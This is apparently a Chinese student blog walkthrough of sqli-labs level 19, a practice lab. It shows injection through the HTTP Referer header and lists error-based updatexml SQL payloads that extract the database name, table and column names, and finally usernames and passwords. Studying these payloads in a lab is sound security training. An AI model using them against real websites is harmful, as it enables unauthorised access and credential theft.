sqli-labs关卡19(基于http头部报错盲注)通关思路

文章目录


前言

此文章只用于学习和反思巩固sql注入知识,禁止用于做非法攻击。注意靶场是可以练习的平台,不能随意去尚未授权的网站做渗透测试!!!


一、回顾上一关知识点

上一关我们通过http头部的user-agent值进行注入,了解了http头部的一些常见可以注入的地方。这一关同样也是http头部注入,只不过不是user-agent了。这一关我就不先看源码了,有了上一关经验。

二、靶场第十九关通关思路

  • 1、判断注入点
  • 2、爆数据库名
  • 3、爆数据库表
  • 4、爆数据库列
  • 5、爆数据库关键信息

1、判断注入点

这里发现19关页面和上一关基本没区别,我们这里用一个测试账号登录(用admin)。因为登录才能记录用户的信息。(如图所示)

这里发现页面回显了一个referer字段,从上一关讲解可以知道,referer字段是http请求头部内容之一。它的作用是来记录你源地址url的,因为我没有跳转到其他页面,就是在第十九关页面输信息。所以referer字段就是第十九关的地址。因为页面带回的这个referer字段内容,那么可想而知,会不会是后台管理员把referer拼接到数据库后回显到web页面的呢?我们不妨试一试

用 and 1=1和and 1=2 发现页面正常,排除数字型。(如图所示)

直接提交单引号发现页面报错,报错语句为

You have an error in your SQL syntax; check the manual that

corresponds to your MySQL server version for the right syntax to use

near 'xxx.xxx.xxx.xxx')' at line 1

通过报错语句可以猜测原始语句应该是

php 复制代码
('refer','ip')

因为我们多了一个单引号所以报错了,我们尝试构造payload

也就是

php 复制代码
1',1)#

那么在原始语句就是

php 复制代码
('refer',1)#','ip')

这样就构造成功了,页面正常(如图所示)

现在我们来看源代码看看是不是这么回事

发现是和我们想到的语句一样。因为有报错回显,无回显数据内容,所以用报错盲注。

2、爆数据库名

注入语句为

php 复制代码
1' and updatexml(1,concat(0x3a,(select database()),0x3a),1),1)#

3、爆数据库表

注入语句为

php 复制代码
1' and updatexml(1,concat(0x3a,(select table_name from information_schema.tables where table_schema=database() limit 3,1),0x3a),1),1)#


得到关键数据库表名users

4、爆数据库列

注入语句为

php 复制代码
1' and updatexml(1,concat(0x3a,(select column_name from information_schema.columns where table_schema=database() and table_name="users" limit 1,1),0x3a),1),1)#
php 复制代码
1' and updatexml(1,concat(0x3a,(select column_name from information_schema.columns where table_schema=database() and table_name="users" limit 2,1),0x3a),1),1)#



得到关键数据库列username,password

5、爆数据库关键信息

注入语句为

php 复制代码
1' and updatexml(1,concat(0x3a,(select password from users limit 0,1),0x3a),1),1)#
php 复制代码
1' and updatexml(1,concat(0x3a,(select username from users limit 0,1),0x3a),1),1)#


得到账号密码


总结

这一关也是通过http头部注入,只是注入点不同。只要知道原理,和怎么构造payload的话,基本没什么问题。此文章是小白自己为了巩固sql注入而写的,大佬路过请多指教!

相关推荐
星马梦缘23 分钟前
计算机网络4 第四章 网络层——网络间的通信问题(省际之间如何规划信件运输路线)
网络·计算机网络·路由·ip地址·子网掩码·icmp·ipv4/ipv6
练小杰33 分钟前
【Mysql-installer-community-8.0.26.0】Mysql 社区版(8.0.26.0) 在Window 系统的默认安装配置
数据库·sql·mysql·adb·配置文件·mysql安装·关系型数据库
Lris-KK1 小时前
【Leetcode】高频SQL基础题--1164.指定日期的产品价格
sql·leetcode
hsjkdhs2 小时前
万字详解网络编程之socket
网络·tcp/ip·udp·socket
lingggggaaaa2 小时前
小迪安全v2023学习笔记(七十九讲)—— 中间件安全&IIS&Apache&Tomcat&Nginx&CVE
笔记·学习·安全·web安全·网络安全·中间件·apache
想睡hhh3 小时前
HTTPS协议——对于HTTP的协议的加密
http·https
@是你太难忘3 小时前
计算机网络IP协议
网络·tcp/ip·计算机网络
attitude.x4 小时前
Swift 协议扩展与泛型:构建灵活、可维护的代码的艺术
运维·服务器·网络
jnrjian5 小时前
v$lock TS lock id1 用于发现Oracle pdb不能关闭的sid
sql·oracle
RTC老炮5 小时前
webrtc弱网-LossBasedBandwidthEstimation类源码分析与算法原理
网络·算法·webrtc